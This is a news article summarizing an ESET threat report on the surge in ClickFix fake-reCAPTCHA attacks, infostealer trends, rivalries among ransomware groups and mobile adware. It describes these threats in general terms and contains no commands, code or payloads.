In a striking development within the cybersecurity landscape, the ClickFix attack vector has surged by an astonishing 517% since the latter half of 2024, positioning itself as the second most exploited method for cyberattacks, trailing only behind phishing. This alarming trend is detailed in ESET’s H2 2025 Threat Report, which highlights how hackers are leveraging ClickFix to deploy various infostealing malware, including notorious variants such as Lumma Stealer, VidarStealer, StealC, and Danabot.
Understanding the ClickFix Mechanism
The ClickFix attack operates through a deceptive mechanism that employs a counterfeit reCAPTCHA to lure unsuspecting users into executing code within a Powershell terminal. Victims are often misled into believing they are resolving a fictitious error by following simple commands, which can lead to the execution of complex and harmful scripts. Many users, focused on rectifying the supposed issue, may overlook the implications of the commands they are running.
Typically, ClickFix is disseminated via phishing emails that direct users to fraudulent websites requiring reCAPTCHA verification for access. The nature of Powershell commands allows them to frequently evade detection by antivirus software, rendering this method particularly effective for cybercriminals who can manipulate users into unwittingly compromising their devices.
Rising Threats in Infostealers
In related infostealer news, ESET’s Threat Report reveals that SnakeStealer has now surpassed Agent Tesla as the most frequently detected infostealer. SnakeStealer has been implicated in a significant campaign targeting numerous businesses across the US and EU, with the primary objective of credential theft.
Meanwhile, the ransomware landscape has experienced a period of unexpected turmoil, largely attributed to internal conflicts and rivalries among various ransomware groups. The DragonForce group has notably initiated a series of defacement campaigns against prominent ransomware entities, including BlackLock, Mamona, and the ransomware-as-a-service powerhouse, RansomHub. Despite recent law enforcement actions aimed at dismantling ransomware operations, such as the seizure of 8base, it appears that these internal rivalries have inflicted considerable damage on the overall ransomware ecosystem.
Mobile Malware Trends
On the mobile front, the emergence of Kaleidoscope infections has led to a staggering 160% increase in Android adware detections. The distribution of malware through official app stores is not a novel occurrence; however, the recent SparkKitty malware has been found circulating through both the Apple App Store and Google Play Store. Kaleidoscope employs a dual-pronged attack strategy, generating advertising revenue through intrusive ads while simultaneously infecting devices with a malicious twin app sourced from third-party app stores.
“From novel social engineering techniques to sophisticated mobile threats and major infostealer disruptions, the threat landscape in the first half of 2025 was anything but boring,” remarked Jiří Kropáč, ESET Director of Threat Prevention Labs. This statement encapsulates the dynamic and evolving nature of cybersecurity challenges that businesses must navigate in the current environment.
